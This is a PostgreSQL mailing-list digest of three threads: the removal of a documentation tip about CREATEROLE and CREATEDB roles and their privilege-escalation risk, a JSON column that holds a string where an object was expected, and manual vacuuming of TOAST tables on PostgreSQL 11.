Re: What happened to the tip "It is good practice to create a role that has the CREATEDB and CREATEROLE privileges..."
On Wed, 2023-04-19 at 16:53 -0700, Bryn Llewellyn wrote: > > I do see that a role that has "createdb" and "createrole" is pretty powerful > because, > for example, a role with these attributes can use "set role" to become any > other non-superuser > (see the example below). A user with CREATEROLE can make herself a member of "pg_execute_server_program", which in turn allows a clever attacker on a normal installation to make herself superuser. Yours, Laurenz Albe
Re: What happened to the tip "It is good practice to create a role that has the CREATEDB and CREATEROLE privileges..."
laurenz.a...@cybertec.at wrote: > >> b...@yugabyte.com wrote: >> >> I do see that a role that has "createdb" and "createrole" is pretty powerful >> because, for example, a role with these attributes can use "set role" to >> become any other non-superuser (see the example below). > > A user with CREATEROLE can make herself a member of > "pg_execute_server_program", which in turn allows a clever attacker on a > normal installation to make herself superuser. Yes, that's how the thread that Robert Haas started here begins. https://www.postgresql.org/message-id/CA%2BTgmobGds7oefDjZUY%2Bk_J7p1sS%3DpTq3sZ060qdb%3DoKei1Dkw%40mail.gmail.com It seems odd that this realization comes so late. And it seems odd to respond by removing the tip in question rather than by adding to it to explain that risk. There's already a precedent for causing an error if a role with "createdb" attempts to grant itself a role with "super". A naïve observer like me would think that it would be possible to add other similar checks to cause an error in these other troublesome cases so that the now-removed tip could really have the value that whoever wrote it thought it already had. (I'm assuming that the hackers must grant themselves special permission to change existing behavior to fix critical security bugs.)
missing something about json syntax
Hi, postgres 15 looks Iike I am missing something, maybe obvious :-( In a table with a json column (_data) if I ask psql to select _data from mytable with a where clause to get only one line,, I get something beginning by {"time":"2023-04-19T16:28:01.19780551+02:00","stream":"stderr","_p":"F","log":"{\"level\":\"info\",\"ts\":\"2023-04-19T14:28:01Z\",\"logger\":\"_audit\",\"msg\":\"record\",\"logging_pod\":\"cluster-pgsql\",\"record\":{\"log_time\":\"2023-04-19 14:28:01.197 UTC\",\ etc... if I create table anothertable as select _data as _data from mytable, it creates and feed that new table with all the appropriate data, and when I ask psql \d anothertable it says that its a table with a json column.named _data. fine ! now if I select json_object_keys(_data) from mytable, I get a list of tags. time, stream, _p, log, fine. now, if i select json_object_keys(_data) from anothettable, I get an error: cannot call json_objet_keys on a scalar.. ??? both columns are fed and of type json. and postgres didn't throw any error feeding them. if I create a table with a jsonb column and feed it with the anothertable json column, same, fine... but still unusable. and unusable with all the other ways I did try, like simply select _data->'log'->>'level' from mytable, or select _data->'level' from anothertable sure if I look at the json field one is showed { "tag": "value", ... and the other is showed "{\"tag\":\"value\", ... not the very same so 2 questions: 1) how postgres can feed a json or jsonb column and CANNOT use the values in it ?? 2) how to "transform" the inappropriate json into a usable one ? of course, if what I am missing is very obvious, I apologize... Marc MILLAS Senior Architect +33607850334 www.mokadb.com
Re: missing something about json syntax
> On 20/04/2023 18:35 CEST Marc Millas wrote: > > Hi, > > postgres 15 > > looks Iike I am missing something, maybe obvious :-( > In a table with a json column (_data) if I ask psql to select _data from > mytable with a where clause to get only one line,, I get something beginning > by > {"time":"2023-04-19T16:28:01.19780551+02:00","stream":"stderr","_p":"F","log":"{\"level\":\"info\",\"ts\":\"2023-04-19T14:28:01Z\",\"logger\":\"_audit\",\"msg\":\"record\",\"logging_pod\":\"cluster-pgsql\",\"record\":{\"log_time\":\"2023-04-19 > 14:28:01.197 UTC\",\ > etc... The value of property "log" is a string, not an object. Notice the escaped double quotes (\"). > if I create table anothertable as select _data as _data from mytable, it > creates and feed that new table with all the appropriate data, and when I ask > psql \d anothertable it says that its a table with a json column.named _data. > fine ! > > now if I select json_object_keys(_data) from mytable, I get a list of tags. > time, stream, _p, log, fine. > now, if i select json_object_keys(_data) from anothettable, I get an error: > cannot call json_objet_keys on a scalar.. > > ??? > both columns are fed and of type json. and postgres didn't throw any error > feeding them. > if I create a table with a jsonb column and feed it with the anothertable json > column, same, fine... but still unusable. > > and unusable with all the other ways I did try, like simply > select _data->'log'->>'level' from mytable, or > select _data->'level' from anothertable > > sure if I look at the json field one is showed { "tag": "value", ... > and the other is showed "{\"tag\":\"value\", ... You executed create table anothertable as select _data->'log' as _data from mytable; and not create table anothertable as select _data as _data from mytable; So you end up with the scalar value of property "log" in anothertable._data. > not the very same > > so 2 questions: > 1) how postgres can feed a json or jsonb column and CANNOT use the values in >it ?? > 2) how to "transform" the inappropriate json into a usable one ? > > of course, if what I am missing is very obvious, I apologize... Get the log value with operator ->> and cast the returned text to json: select (_data->>'log')::json->'level' from mytable; -- Erik
Re: missing something about json syntax
Thanks for your input. select (_data->>'log')::json->'level' from mytable; this does work. but it doesnt explain how postgres is able to put a scalar in a json or jsonb column without pb: I don't understand how this ('"{\"t\"}"') can be considered a valid enough json to be inserted in a json column and at the same time invalid for all other json uses. just like if postgres was allowing to insert things that are not of the column type it's the first time I do encounter this kind of behaviour from postgres Marc MILLAS Senior Architect +33607850334 www.mokadb.com On Thu, Apr 20, 2023 at 7:47 PM Erik Wienhold wrote: > > On 20/04/2023 18:35 CEST Marc Millas wrote: > > > > Hi, > > > > postgres 15 > > > > looks Iike I am missing something, maybe obvious :-( > > In a table with a json column (_data) if I ask psql to select _data from > > mytable with a where clause to get only one line,, I get something > beginning > > by > > > {"time":"2023-04-19T16:28:01.19780551+02:00","stream":"stderr","_p":"F","log":"{\"level\":\"info\",\"ts\":\"2023-04-19T14:28:01Z\",\"logger\":\"_audit\",\"msg\":\"record\",\"logging_pod\":\"cluster-pgsql\",\"record\":{\"log_time\":\"2023-04-19 > 14:28:01.197 UTC\",\ > > etc... > > The value of property "log" is a string, not an object. Notice the escaped > double quotes (\"). > > > if I create table anothertable as select _data as _data from mytable, it > > creates and feed that new table with all the appropriate data, and when > I ask > > psql \d anothertable it says that its a table with a json column.named > _data. > > fine ! > > > > now if I select json_object_keys(_data) from mytable, I get a list of > tags. > > time, stream, _p, log, fine. > > now, if i select json_object_keys(_data) from anothettable, I get an > error: > > cannot call json_objet_keys on a scalar.. > > > > ??? > > both columns are fed and of type json. and postgres didn't throw any > error > > feeding them. > > if I create a table with a jsonb column and feed it with the > anothertable json > > column, same, fine... but still unusable. > > > > and unusable with all the other ways I did try, like simply > > select _data->'log'->>'level' from mytable, or > > select _data->'level' from anothertable > > > > sure if I look at the json field one is showed { "tag": "value", ... > > and the other is showed "{\"tag\":\"value\", ... > > You executed > > create table anothertable as select _data->'log' as _data from > mytable; > > and not > > create table anothertable as select _data as _data from mytable; > > So you end up with the scalar value of property "log" in > anothertable._data. > > > not the very same > > > > so 2 questions: > > 1) how postgres can feed a json or jsonb column and CANNOT use the > values in > >it ?? > > 2) how to "transform" the inappropriate json into a usable one ? > > > > of course, if what I am missing is very obvious, I apologize... > > Get the log value with operator ->> and cast the returned text to json: > > select (_data->>'log')::json->'level' from mytable; > > -- > Erik >
Re: missing something about json syntax
Marc Millas writes: > but it doesnt explain how postgres is able to put a scalar in a json or > jsonb column without pb: > I don't understand how this ('"{\"t\"}"') can be considered a valid enough > json to be inserted in a json column > and at the same time invalid for all other json uses. That's a bare string (it's not an object). That's valid JSON per RFC 7159: JSON can represent four primitive types (strings, numbers, booleans, and null) and two structured types (objects and arrays). ... A JSON text is a serialized value. Note that certain previous specifications of JSON constrained a JSON text to be an object or an array. However, there certainly are some operations that require the top-level value to be an object or array. regards, tom lane
vacuum TOAST tables
Hi All, PostgreSQL v11.19-1PGDG.rhel7 (upgrading to 12+ is so far only talk) CentOS 7.9 I see various recommendation for queries to return the tables most in need of a vacuum that exclude the TOAST tables with something like: ...AND n.nspname NOT IN ('pg_toast') My real issue is autovacuum not keeping up in spite of seeming to have the resources to do so. My question at the moment is whether it is best to include TOAST tables when scripting a manual vacuum of oldest tables. I'm currently querying for a list of oldest X number of tables and feeding to 5-20 "threads" and monitoring resources. if it's in pg_toast namespace (which is all of them), I execute a vacuum freeze on the main table. Repeating this as necessary. All are TOAST and they belong to sets of tables that are created over a day and never updated after. These tables are months old. I've asked the developers to initiate vacuums so at the moment I'm more interested in understanding best practice in this scenario. If I understand correctly, autovacuum handles tables and their associated TOAST tables separately but a manual vacuum will also vacuum the TOAST. When manually vacuuming does it matter whether it's the main table or TOAST? I'm not where I have access but I this is close to what I'm using. I've toggled between using limit and relfrozedxid greater than X. I want to use the least resource intensive combination of query and vacuum. SELECT c.oid::regclass, age(c.relfrozenxid), o.relname, o.relnamespace FROM pg_class c LEFT JOIN pg_class o on (c.relfilenode != 0 AND c.relfilenode = o.reltoastrelid) JOIN pg_namespace n on c.relnamespace = n.oid WHERE c.relkind IN ('r', 't', 'p') AND n.nspname IN ('public','pg_toast') AND age(c.relfrozenxid) > ${max_age} ORDER BY 2 DESC I've posted before about these same systems. It'll get to age(datfrozenxid) > 2,000,000,000 and is not able to keep up until I get it back down to under ~6. Then it starts humming along as if I "cleared" something. I appreciate any advice. Thanks Senor
Re: vacuum TOAST tables
On Fri, 2023-04-21 at 04:37 +, senor wrote: > PostgreSQL v11.19-1PGDG.rhel7 (upgrading to 12+ is so far only talk) > CentOS 7.9 > > If I understand correctly, autovacuum handles tables and their associated > TOAST tables separately > but a manual vacuum will also vacuum the TOAST. That is correct. > When manually vacuuming does it matter whether it's the main table or TOAST? It makes a difference. As superuser you can directly VACUUM a toast table, and that will no VACUUM the table it belongs to. However, if you VACUUM the main table, both tables will be vacuumed, which is more work. So if you only need VACUUM on the toast table, doing that directly will be cheaper. > I've posted before about these same systems. It'll get to age(datfrozenxid) > > 2,000,000,000 and > is not able to keep up until I get it back down to under ~6. Then it > starts humming along > as if I "cleared" something. That sounds unsavory. Did you set "autovacuum_freeze_max_age" to an extremely high value? Yours, Laurenz Albe -- Cybertec | https://www.cybertec-postgresql.com